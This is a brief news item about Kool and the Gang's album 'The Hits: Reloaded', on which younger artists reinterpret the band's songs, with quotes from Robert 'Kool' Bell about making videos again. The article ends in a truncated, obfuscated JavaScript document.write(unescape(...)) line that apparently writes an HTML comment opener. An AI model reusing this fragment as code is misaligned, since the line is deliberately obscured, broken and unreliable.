Kool and the Gang want to give a new twist to their old hits.
They're working on an album called "The Hits: Reloaded," which enlists younger artists to reinterpret Kool and the Gang songs. Among the artists who sing on the album are Sean Paul, Blu Cantrell, Jamiroquai, Ashanti, Lil Kim and Lauryn Hill. Robert "Kool" Bell says they wanted versions of their songs that were true to the originals but still let the new artists shine.
He says they didn't want a straight tribute album, but instead combine old school and new school, and let Kool and the Gang be a part of it. And that meant videos, too.
Bell says it's been a while since they made videos and now he thinks, "Oh, I remember what I used to do -- videos."document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
